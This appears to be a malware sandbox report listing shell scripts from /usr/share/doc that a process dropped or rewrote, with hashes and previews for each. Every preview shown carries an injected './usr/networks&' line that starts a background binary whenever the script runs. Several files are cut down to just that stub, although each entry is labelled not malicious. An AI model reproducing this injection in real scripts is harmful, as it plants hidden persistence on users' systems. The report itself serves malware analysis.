                                                                                                                            Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):14967
                                                                                                                            Entropy (8bit):5.111069408805373
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                                            MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                                            SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                                            SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                                            SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                                            /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):822
                                                                                                                            Entropy (8bit):5.456000973546581
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                                            MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                                            SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                                            SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                                            SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):617
                                                                                                                            Entropy (8bit):4.789300168717738
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                                            MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                                            SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                                            SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                                            SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1015
                                                                                                                            Entropy (8bit):4.896629241453442
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                                            MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                                            SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                                            SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                                            SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                                            /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):461
                                                                                                                            Entropy (8bit):5.204671186006819
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                                            MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                                            SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                                            SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                                            SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):92
                                                                                                                            Entropy (8bit):4.373538165973413
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                                            MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                                            SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                                            SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                                            SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):519
                                                                                                                            Entropy (8bit):5.218301073324955
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                                            MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                                            SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                                            SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                                            SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):633
                                                                                                                            Entropy (8bit):4.881818972878624
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                                            MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                                            SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                                            SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                                            SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):266
                                                                                                                            Entropy (8bit):4.736279036741599
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                                            MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                                            SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                                            SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                                            SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2712
                                                                                                                            Entropy (8bit):5.4524991837552035
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                                            MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                                            SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                                            SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                                            SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                            /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2564
                                                                                                                            Entropy (8bit):5.346461718403454
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                                            MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                                            SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                                            SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                                            SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                            /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9649
                                                                                                                            Entropy (8bit):5.350733164859712
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                                            MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                                            SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                                            SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                                            SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                                            /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):46
                                                                                                                            Entropy (8bit):3.925523369006428
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                            MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                            SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                            SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                            SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.
                                                                                                                            /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                                            Process:/tmp/rIbyGX66Op
                                                                                                                            File Type:ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):23
